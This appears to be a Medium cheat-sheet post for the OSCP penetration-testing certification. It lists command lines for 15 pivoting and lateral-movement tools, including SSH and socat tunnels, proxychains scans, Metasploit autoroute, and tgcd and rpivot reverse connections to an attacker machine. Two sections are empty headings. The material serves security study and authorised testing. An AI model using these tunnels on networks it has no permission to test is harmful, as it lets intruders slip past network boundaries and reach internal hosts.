🥷 Cracking the OSCP certification: 15 tools for Pivoting and Lateral Movement

#1: Pivoting with rinetd

rinetd -f -c rinetd.conf
# rinetd.conf

# bindaddress bindport connectaddress connectport
$PUBLICIP 80 $IP 80

#2: Pivoting with plink.exe

plink -l root -pw pass -R 3389:127.0.0.1:3389 $IP -P 80 -N

#3: Pivoting with SSH / OpenSSH

ssh <GATEWAY/SSH server> -L <PORT>:<REMOTE SERVER>:<REMOTE PORT>
ssh -L <localhost port>:<remote IP>:<remote port> $IP
ssh -R <REMOTE PORT>:<LOCAL HOST>:<LOCAL PORT> $IP 
ssh -R <server side port>:<localhost>:<local port> $IP
ssh -D <LOCAL PROXY PORT> -p <REMOTE PORT> <TARGET>

#4: Pivoting with VPN over SSH

# /etc/ssh/sshd_config

PermitRootLogin yes
PermitTunnel yes
ssh user@server -w any:any

#5: Pivoting with proxychains

ssh -f -N -R 2222:127.0.0.1:22 root@kali
ssh -f -N -D 127.0.0.1:8080 -p 2222 hax0r@127.0.0.1
[ProxyList]
socks4 127.0.0.1 8080
proxychains nmap --top-ports=20 -sT -Pn $IP/24

#6: Pivoting with FreeSSHd.exe

#7: Pivoting with tinyproxy

#8: Pivoting with rpivot

  • Reverse socks proxy / Opposite to ssh -D / Supports windows credentials to use with a corporate proxy
  • Server should be started on pentester’s machine and listen to incoming connections from the client.
  • Python but no dependencies
python server.py --proxy-port 1080 --server-port 9900 --server-ip $IP
python client.py --server-ip $IP --server-port 9900

#9: Pivoting with 3proxy

# 3proxy.config

socks -p1080 # socks proxy
# 3proxy.config

tcppm <localport> <targethost> <targetport>
./3proxy 3proxy.config &

#10: Pivoting with tgcd

  • CC (ConnectConnect)
  • LL (ListenListen)
  • PF (PortForwarder)
tgcd -L -p 9090 -q 4000 [-e tap0] -n -g 10
tgcd -C -s $IP:8080 -c $ATTACKER:4000 -n -g 10

#11: Pivoting with Metasploit

msf> use auxiliary/server/socks4a
msf> run -j
meterpreter> run autoroute -s $IP/24
meterpreter > run autoroute -p
msf exploit(handler) > route add $IP 255.255.255.0 1

#12: Pivoting with ssf

ssfd -p 11111
ssf -D 22222 -p 11111 $TARGET_IP

#13: Pivoting with socat

  • Socat TCP GENDER CHANGER
socat -d -d -d -t5 tcp:$IP:80,forever,intervall=10,fork tcp:localhost:80
socat -d -d -d tcp-l:80,reuseaddr,bind=127.0.0.1,fork tcp-l:80,bind=$IP,reuseaddr,retry=10
mozilla http://127.0.0.1/
  • Socat SSH encapsulation into SSL
socat ssl-l:443,reuseaddr,fork,cert=./server.pem,verify=0 exec:'/usr/sbin/sshd -i'
ssh -o ProxyCommand="socat - 'ssl,verify=0|proxy-connect:%h:443|tcp:proxy:8080" $SERVER
  • Socat SSH deception (Bounds back to the client ssh server)
socat -d -d TCP-L:22,reuseaddr,fork SYSTEM:"nc \$SOCAT_PEERADDR 22"

#14: sshuttle

sshuttle -r pivotmachine@192.168.10.5 192.168.30.0/24

#15: pwncat

pwncat -L 0.0.0.0:5050 example.org 3306
pwncat -R 10.0.0.1:4444 example.org 3306

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
The Unweary Pentester 🥷

Pentesting since 2001. Writing about infrastructure, Linux, Windows, Web and blockchain cybersecurity